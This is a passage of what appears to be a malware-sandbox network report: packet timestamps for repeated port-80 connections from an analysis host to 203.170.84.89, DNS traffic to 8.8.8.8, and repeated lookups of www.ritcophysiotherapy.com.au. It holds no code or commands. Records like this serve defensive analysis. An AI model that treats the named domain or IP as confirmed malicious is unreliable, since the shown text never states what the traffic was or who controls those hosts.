                                          Feb 22, 2021 19:14:16.140557051 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140607119 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.346271992 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.476020098 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.683573008 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.683917999 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.710648060 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.047985077 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.048197985 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.385940075 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.424968958 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.425321102 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.425364971 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.425427914 CET4982580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.661257029 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:17.762456894 CET8049825203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.999090910 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:17.999258995 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.024683952 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.362600088 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.362878084 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.700308084 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739638090 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739775896 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:18.739877939 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.739981890 CET4982680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:18.962858915 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.079659939 CET8049826203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.302432060 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.302584887 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.321867943 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.659957886 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:19.660252094 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:19.998182058 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031702995 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031749964 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.031930923 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.031975985 CET4982780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.257460117 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.371510983 CET8049827203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.595802069 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.596049070 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.599287033 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:20.937453032 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:20.937680960 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.275712967 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306483984 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306590080 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.306638956 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.306674957 CET4982880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.529941082 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.644619942 CET8049828203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.877697945 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:21.877804995 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:21.882520914 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.227745056 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.227998972 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.574868917 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606409073 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606697083 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.606764078 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:22.606859922 CET4982980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.831449986 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:22.951500893 CET8049829203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.168802977 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.169013977 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.176364899 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.514427900 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.515377998 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.852638006 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883021116 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883290052 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:23.883521080 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:23.883599043 CET4983080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.140039921 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.220797062 CET8049830203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.478173018 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.478315115 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.482439995 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:24.820396900 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:24.822552919 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.160581112 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.190963030 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.191011906 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.191106081 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.191157103 CET4983180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.389622927 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.526575089 CET8049831203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.725759029 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:25.728914022 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:25.733887911 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.068190098 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.068434000 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.403249025 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446412086 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446681976 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:26.446708918 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.446783066 CET4983280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.673378944 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:26.782939911 CET8049832203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.008416891 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.008611917 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.016300917 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.351351976 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.351428986 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.686309099 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717015982 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717096090 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:27.717150927 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.719911098 CET4983380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:27.953135967 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.052033901 CET8049833203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.290896893 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.291232109 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.298521042 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.636348009 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:28.636457920 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:28.974087000 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005323887 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005374908 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.005482912 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.005522013 CET4983480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.204662085 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.345088959 CET8049834203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.539346933 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.539640903 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.542202950 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:29.876413107 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:29.876545906 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.211976051 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.244988918 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.245059967 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.245168924 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.245227098 CET4983580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.469335079 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.579262972 CET8049835203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.807482958 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:30.807766914 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:30.810538054 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.145601988 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.145735979 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.481028080 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.511131048 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.511451960 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.511604071 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:31.514045000 CET4983780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.795514107 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:31.846321106 CET8049837203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.132493973 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.132641077 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.137482882 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.474545002 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.474783897 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.812048912 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846445084 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846576929 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:32.846630096 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:32.846697092 CET4983980192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.070969105 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.184250116 CET8049839203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.409128904 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.409208059 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.411950111 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:33.748914957 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:33.749093056 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.085664034 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116691113 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116771936 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.116975069 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.117526054 CET4984080192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.371501923 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.453875065 CET8049840203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.716842890 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:34.717153072 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:34.725025892 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.073568106 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.073873043 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.418869972 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450486898 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450736046 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:35.450814962 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.450840950 CET4984180192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.690229893 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:35.795947075 CET8049841203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.025278091 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.025398970 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.028479099 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.364536047 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.364825964 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.700278044 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741519928 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741547108 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:36.741727114 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.741784096 CET4984280192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:36.992747068 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.078494072 CET8049842203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.326946020 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.327440977 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.334441900 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:37.668519020 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:37.668834925 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.002674103 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.034826040 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.034876108 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.035116911 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.035186052 CET4984380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.277103901 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.370656013 CET8049843203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.615442038 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.615652084 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.623261929 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:38.960230112 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:38.961205006 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.297967911 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339082003 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339129925 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.339318037 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.339365959 CET4984480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.599857092 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.676040888 CET8049844203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.945934057 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:39.946244001 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:39.953346014 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.298930883 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.299132109 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.646445036 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683614016 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683698893 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:40.683887959 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.683969021 CET4984580192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:40.913114071 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.029133081 CET8049845203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.249655962 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.249881983 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.267887115 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.603013039 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.603157043 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.939703941 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979253054 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979475021 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:41.979830027 CET8049846203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:41.979903936 CET4984680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.207290888 CET4984780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:42.315402985 CET8049846203.170.84.89192.168.2.4

                                          UDP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Feb 22, 2021 19:14:27.894123077 CET6243653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:27.951292992 CET53624368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.153413057 CET6123053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.203366041 CET53612308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.859769106 CET6473053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.908608913 CET53647308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:30.406487942 CET6062453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:30.455286026 CET53606248.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.681385040 CET6260053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.727921963 CET5320053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.749803066 CET53626008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.792812109 CET53532008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:33.020991087 CET6103453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:33.069703102 CET53610348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:34.320353031 CET5768753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:34.368915081 CET53576878.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:35.638341904 CET4983953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:35.686975956 CET53498398.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:36.937913895 CET5797553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:36.989465952 CET53579758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:38.226160049 CET5761053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:38.275090933 CET53576108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:39.548564911 CET5513753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:39.597359896 CET53551378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:40.861488104 CET5921653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:40.910367966 CET53592168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:42.153589010 CET6349553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:42.204519987 CET53634958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:43.443846941 CET6437153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:43.493170977 CET53643718.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:44.731411934 CET5403753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:44.783324003 CET53540378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:46.037934065 CET5348153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:46.086884975 CET53534818.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:47.326683998 CET5831353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:47.375808954 CET53583138.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:48.652367115 CET5895053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:48.703289032 CET53589508.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:49.946625948 CET5501153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:49.995392084 CET53550118.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:51.218924046 CET5719853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:51.267704964 CET53571988.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:52.516993046 CET6087553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:52.566010952 CET53608758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:53.796204090 CET5513453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:53.844918966 CET53551348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:55.085910082 CET5369553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:55.140264988 CET53536958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:56.344922066 CET5097553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:56.395956993 CET53509758.8.8.8192.168.2.4

                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 22, 2021 19:13:01.605370045 CET | 192.168.2.4 | 8.8.8.8 | 0xf2b4 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:03.013977051 CET | 192.168.2.4 | 8.8.8.8 | 0xc3d2 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:04.268918991 CET | 192.168.2.4 | 8.8.8.8 | 0xf658 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:05.635144949 CET | 192.168.2.4 | 8.8.8.8 | 0xf93e | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:07.006390095 CET | 192.168.2.4 | 8.8.8.8 | 0xa7f6 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:08.984812021 CET | 192.168.2.4 | 8.8.8.8 | 0x3a63 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:10.312819958 CET | 192.168.2.4 | 8.8.8.8 | 0xddf9 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:11.686445951 CET | 192.168.2.4 | 8.8.8.8 | 0x96c5 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:13.049364090 CET | 192.168.2.4 | 8.8.8.8 | 0x7723 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:14.353496075 CET | 192.168.2.4 | 8.8.8.8 | 0xfb83 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:15.696485043 CET | 192.168.2.4 | 8.8.8.8 | 0x4299 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:17.004920006 CET | 192.168.2.4 | 8.8.8.8 | 0xdb49 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:18.343101025 CET | 192.168.2.4 | 8.8.8.8 | 0x177c | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:19.644253969 CET | 192.168.2.4 | 8.8.8.8 | 0xbe65 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:20.936100960 CET | 192.168.2.4 | 8.8.8.8 | 0x7c9d | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:22.276679039 CET | 192.168.2.4 | 8.8.8.8 | 0x8e2a | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:23.601208925 CET | 192.168.2.4 | 8.8.8.8 | 0x4b1c | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:24.954325914 CET | 192.168.2.4 | 8.8.8.8 | 0x9f7 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:26.557146072 CET | 192.168.2.4 | 8.8.8.8 | 0x8dca | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:27.872664928 CET | 192.168.2.4 | 8.8.8.8 | 0xe56c | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:29.179162979 CET | 192.168.2.4 | 8.8.8.8 | 0xd2ae | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:30.478329897 CET | 192.168.2.4 | 8.8.8.8 | 0x5c1d | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:31.792977095 CET | 192.168.2.4 | 8.8.8.8 | 0x73e3 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:33.080705881 CET | 192.168.2.4 | 8.8.8.8 | 0xa1ca | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
Feb 22, 2021 19:13:34.416704893 CET | 192.168.2.4 | 8.8.8.8 | 0xc977 | Standard query (0) | www.ritcophysiotherapy.com.au | A (IP address) | IN (0x0001)
